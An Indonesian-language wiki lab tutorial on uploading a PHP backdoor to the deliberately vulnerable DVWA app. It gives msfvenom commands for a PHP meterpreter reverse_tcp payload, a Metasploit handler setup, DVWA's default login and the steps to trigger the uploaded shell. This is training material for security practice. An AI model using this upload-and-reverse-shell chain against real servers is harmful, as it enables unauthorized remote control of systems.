DVWA: Upload PHP Backdoor: Difference between revisions

Revision as of 02:40, 27 May 2017

sumber: http://www.computersecuritystudent.com/SECURITY_TOOLS/DVWA/DVWAv107/lesson8/index.html

Di Server DVWA

Ubah ijin folder uploads

sudo su
chown www-data.www-data /var/www/html/DVWA-1.9/hackable/uploads/
chmod 775 /var/www/html/DVWA-1.9/hackable/uploads/
ls -ld /var/www/html/DVWA-1.9/hackable/uploads/

Di Kali Linux

Cek ip address

ifconfig

Misalnya IP address kali linux adalah 192.168.0.2

Buat PHP msfpayload

mkdir -p /root/backdoor
cd /root/backdoor
msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.0.2 LPORT=4444 R > PHONE_HOME.php
ls -l PHONE_HOME.php

Start Payload Listener

Jalankan

msfconsole

Ketik

use exploit/multi/handler
set PAYLOAD php/meterpreter/reverse_tcp
set LHOST 192.168.0.2
set LPORT 4444
exploit

Browse ke DVWA

http://ip-address/DVWA-1.9/
username admin
password password

DVWA Security > Low > Submit
File Upload > Browse

hack

http://ip-address/DVWA-1.9/hackable/uploads/

aktifkan klik

PHONE-HOME.php

Referensi

http://www.computersecuritystudent.com/SECURITY_TOOLS/DVWA/DVWAv107/lesson8/index.html

DVWA: Upload PHP Backdoor: Difference between revisions

Revision as of 02:40, 27 May 2017

Contents

Di Server DVWA

Di Kali Linux

Cek ip address

Buat PHP msfpayload

Start Payload Listener

Browse ke DVWA

hack

Referensi

Navigation menu

Page actions

Page actions

Personal tools

Navigation

Search

Tools